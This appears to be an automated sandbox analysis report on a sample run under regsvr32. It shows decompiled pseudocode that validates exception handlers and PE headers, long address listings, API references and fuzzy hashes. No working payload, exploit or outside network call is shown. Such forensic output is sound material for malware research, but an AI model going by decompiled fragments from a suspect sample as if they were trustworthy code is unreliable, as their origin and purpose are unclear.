                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                    					L3:
                                                                                                                                                                                    					return 0;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                    						do {
                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                    								L20:
                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                    								L60:
                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							L9:
                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                    							L15:
                                                                                                                                                                                    							_t81 =  *0x4d741f8;
                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                    								L18:
                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                    									L59:
                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                    										L46:
                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                    										 *0x4d74240 = 1;
                                                                                                                                                                                    										__eflags =  *0x4d74240;
                                                                                                                                                                                    										if( *0x4d74240 != 0) {
                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t84 =  *0x4d741f8;
                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                    											L51:
                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                    												L58:
                                                                                                                                                                                    												 *0x4d74240 = 0;
                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                    												L56:
                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                    													 *0x4d741f8 = _t86;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												do {
                                                                                                                                                                                    													_t68 = 0x4d74200 + _t94 * 4;
                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t69 = 0x4d741fc + _t84 * 4;
                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                    												continue;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								L16:
                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
                                                                                                                                                                                    								if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							 *0x4d74240 = 1;
                                                                                                                                                                                    							__eflags =  *0x4d74240;
                                                                                                                                                                                    							if( *0x4d74240 != 0) {
                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
                                                                                                                                                                                    							if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                    								L32:
                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                    									L34:
                                                                                                                                                                                    									 *0x4d74240 = 0;
                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								do {
                                                                                                                                                                                    									L33:
                                                                                                                                                                                    									_t90 = 0x4d74200 + _t100 * 4;
                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                    								L28:
                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                    									 *0x4d741f8 = _t81;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								L25:
                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
                                                                                                                                                                                    								if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					L5:
                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}




































                                                                                                                                                                                    0x04d7248f
                                                                                                                                                                                    0x04d72492
                                                                                                                                                                                    0x04d72498
                                                                                                                                                                                    0x04d724b6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d724b6
                                                                                                                                                                                    0x04d724a0
                                                                                                                                                                                    0x04d724a9
                                                                                                                                                                                    0x04d724af
                                                                                                                                                                                    0x04d724be
                                                                                                                                                                                    0x04d724c1
                                                                                                                                                                                    0x04d724c4
                                                                                                                                                                                    0x04d724ce
                                                                                                                                                                                    0x04d724ce
                                                                                                                                                                                    0x04d724d0
                                                                                                                                                                                    0x04d724d3
                                                                                                                                                                                    0x04d724d5
                                                                                                                                                                                    0x04d724d5
                                                                                                                                                                                    0x04d724d7
                                                                                                                                                                                    0x04d724da
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d724dc
                                                                                                                                                                                    0x04d724de
                                                                                                                                                                                    0x04d72544
                                                                                                                                                                                    0x04d72544
                                                                                                                                                                                    0x04d726a2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d726a2
                                                                                                                                                                                    0x04d724e0
                                                                                                                                                                                    0x04d724e0
                                                                                                                                                                                    0x04d724e4
                                                                                                                                                                                    0x04d724e6
                                                                                                                                                                                    0x04d724e6
                                                                                                                                                                                    0x04d724e6
                                                                                                                                                                                    0x04d724e6
                                                                                                                                                                                    0x04d724e9
                                                                                                                                                                                    0x04d724ea
                                                                                                                                                                                    0x04d724ed
                                                                                                                                                                                    0x04d724ed
                                                                                                                                                                                    0x04d724f1
                                                                                                                                                                                    0x04d724f5
                                                                                                                                                                                    0x04d72503
                                                                                                                                                                                    0x04d72503
                                                                                                                                                                                    0x04d7250b
                                                                                                                                                                                    0x04d72511
                                                                                                                                                                                    0x04d72513
                                                                                                                                                                                    0x04d72515
                                                                                                                                                                                    0x04d72525
                                                                                                                                                                                    0x04d72532
                                                                                                                                                                                    0x04d72536
                                                                                                                                                                                    0x04d7253b
                                                                                                                                                                                    0x04d7253d
                                                                                                                                                                                    0x04d725bb
                                                                                                                                                                                    0x04d725bb
                                                                                                                                                                                    0x04d7253f
                                                                                                                                                                                    0x04d7253f
                                                                                                                                                                                    0x04d7253f
                                                                                                                                                                                    0x04d725bd
                                                                                                                                                                                    0x04d725bf
                                                                                                                                                                                    0x04d726a0
                                                                                                                                                                                    0x04d726a0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725c5
                                                                                                                                                                                    0x04d725c5
                                                                                                                                                                                    0x04d725cc
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725d2
                                                                                                                                                                                    0x04d725d6
                                                                                                                                                                                    0x04d72632
                                                                                                                                                                                    0x04d72634
                                                                                                                                                                                    0x04d7263c
                                                                                                                                                                                    0x04d7263e
                                                                                                                                                                                    0x04d72640
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72642
                                                                                                                                                                                    0x04d72648
                                                                                                                                                                                    0x04d7264a
                                                                                                                                                                                    0x04d7264c
                                                                                                                                                                                    0x04d72661
                                                                                                                                                                                    0x04d72661
                                                                                                                                                                                    0x04d72663
                                                                                                                                                                                    0x04d72692
                                                                                                                                                                                    0x04d72699
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72699
                                                                                                                                                                                    0x04d72667
                                                                                                                                                                                    0x04d72668
                                                                                                                                                                                    0x04d7266a
                                                                                                                                                                                    0x04d7266c
                                                                                                                                                                                    0x04d7266c
                                                                                                                                                                                    0x04d7266e
                                                                                                                                                                                    0x04d72670
                                                                                                                                                                                    0x04d72672
                                                                                                                                                                                    0x04d72686
                                                                                                                                                                                    0x04d72686
                                                                                                                                                                                    0x04d72689
                                                                                                                                                                                    0x04d7268b
                                                                                                                                                                                    0x04d7268b
                                                                                                                                                                                    0x04d7268c
                                                                                                                                                                                    0x04d7268c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72674
                                                                                                                                                                                    0x04d72674
                                                                                                                                                                                    0x04d72674
                                                                                                                                                                                    0x04d7267d
                                                                                                                                                                                    0x04d7267e
                                                                                                                                                                                    0x04d72680
                                                                                                                                                                                    0x04d72682
                                                                                                                                                                                    0x04d72682
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72674
                                                                                                                                                                                    0x04d72672
                                                                                                                                                                                    0x04d7264e
                                                                                                                                                                                    0x04d72655
                                                                                                                                                                                    0x04d72655
                                                                                                                                                                                    0x04d72657
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72659
                                                                                                                                                                                    0x04d7265a
                                                                                                                                                                                    0x04d7265d
                                                                                                                                                                                    0x04d7265f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7265f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72655
                                                                                                                                                                                    0x04d725d8
                                                                                                                                                                                    0x04d725db
                                                                                                                                                                                    0x04d725e0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725e9
                                                                                                                                                                                    0x04d725eb
                                                                                                                                                                                    0x04d725f1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725f7
                                                                                                                                                                                    0x04d725fd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72603
                                                                                                                                                                                    0x04d72605
                                                                                                                                                                                    0x04d7260e
                                                                                                                                                                                    0x04d72612
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72618
                                                                                                                                                                                    0x04d7261b
                                                                                                                                                                                    0x04d7261d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72624
                                                                                                                                                                                    0x04d72626
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72628
                                                                                                                                                                                    0x04d7262c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7262c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72517
                                                                                                                                                                                    0x04d72517
                                                                                                                                                                                    0x04d72517
                                                                                                                                                                                    0x04d7251e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72520
                                                                                                                                                                                    0x04d72521
                                                                                                                                                                                    0x04d72523
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72523
                                                                                                                                                                                    0x04d7254b
                                                                                                                                                                                    0x04d7254d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7255d
                                                                                                                                                                                    0x04d7255f
                                                                                                                                                                                    0x04d72561
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72567
                                                                                                                                                                                    0x04d7256e
                                                                                                                                                                                    0x04d7259a
                                                                                                                                                                                    0x04d7259a
                                                                                                                                                                                    0x04d7259c
                                                                                                                                                                                    0x04d7259e
                                                                                                                                                                                    0x04d725b2
                                                                                                                                                                                    0x04d725b4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725a0
                                                                                                                                                                                    0x04d725a0
                                                                                                                                                                                    0x04d725a0
                                                                                                                                                                                    0x04d725a9
                                                                                                                                                                                    0x04d725aa
                                                                                                                                                                                    0x04d725ac
                                                                                                                                                                                    0x04d725ae
                                                                                                                                                                                    0x04d725ae
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d725a0
                                                                                                                                                                                    0x04d72570
                                                                                                                                                                                    0x04d72573
                                                                                                                                                                                    0x04d72575
                                                                                                                                                                                    0x04d72587
                                                                                                                                                                                    0x04d72587
                                                                                                                                                                                    0x04d7258a
                                                                                                                                                                                    0x04d7258c
                                                                                                                                                                                    0x04d7258c
                                                                                                                                                                                    0x04d7258d
                                                                                                                                                                                    0x04d7258d
                                                                                                                                                                                    0x04d72593
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72577
                                                                                                                                                                                    0x04d72577
                                                                                                                                                                                    0x04d72577
                                                                                                                                                                                    0x04d7257e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72580
                                                                                                                                                                                    0x04d72580
                                                                                                                                                                                    0x04d72581
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72581
                                                                                                                                                                                    0x04d72583
                                                                                                                                                                                    0x04d72585
                                                                                                                                                                                    0x04d72598
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72598
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72585
                                                                                                                                                                                    0x04d724f7
                                                                                                                                                                                    0x04d724fa
                                                                                                                                                                                    0x04d724fd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d724ff
                                                                                                                                                                                    0x04d72501
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72501
                                                                                                                                                                                    0x04d724c6
                                                                                                                                                                                    0x04d724c8
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04D72536
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                    • Opcode ID: 1d4e5d00cc66bea443f19e89faca48c90657286c177e28d97c9d1d31d465e89d
                                                                                                                                                                                    • Instruction ID: c59114725c44396c7cd9bdb0cbd7d85e1f1ab1f969b2421541aee3e59987a78a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d4e5d00cc66bea443f19e89faca48c90657286c177e28d97c9d1d31d465e89d
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE61B2307406929FDB2ACE28D8E476D73F6FB95358F6484AAD956C7290F730F8828650
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumSystemLocalesA.KERNEL32(Function_000107DF,00000001), ref: 04D8FB91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                    • Opcode ID: 4df5a7adc2633f98dc9b510e6ec90e01d3bc9ef0ad31518b4d76852a7561104c
                                                                                                                                                                                    • Instruction ID: 584884f0823fe59621862c1cf7fb0df22ac622e5c99e4503f36bbfea91afd6fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4df5a7adc2633f98dc9b510e6ec90e01d3bc9ef0ad31518b4d76852a7561104c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD052B0E003008BE7202F70A988BB177E0FB10B1AFA0880DDC9280480C2B8A8CA8A00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 0-1018135373
                                                                                                                                                                                    • Opcode ID: ab92b5ffd4751508c2f9bfae7263aa02ff3da691027cfd2ee4e573425adbcd34
                                                                                                                                                                                    • Instruction ID: d17376f0560d1c6f65de68e2d51ee82139ef4e3041f0cf0e5326668152a9294d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab92b5ffd4751508c2f9bfae7263aa02ff3da691027cfd2ee4e573425adbcd34
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8517D302042019FD724EF29D4A4A7AB3E2FF85728F54856DEC9A8B3A5DB71F844CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e7d55703b9506ff0d440144fa33a006cc085c96c5b8b8f3f49560bf29242630e
                                                                                                                                                                                    • Instruction ID: e114917592ae983c6a98893326cac8342d8c7ed9ca6fd7b5fff15c24fb5ba69a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7d55703b9506ff0d440144fa33a006cc085c96c5b8b8f3f49560bf29242630e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75028033D497B39B9F764EB940E056E7AE06F0169030F87E8DCD0AF296D116ED0996E0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
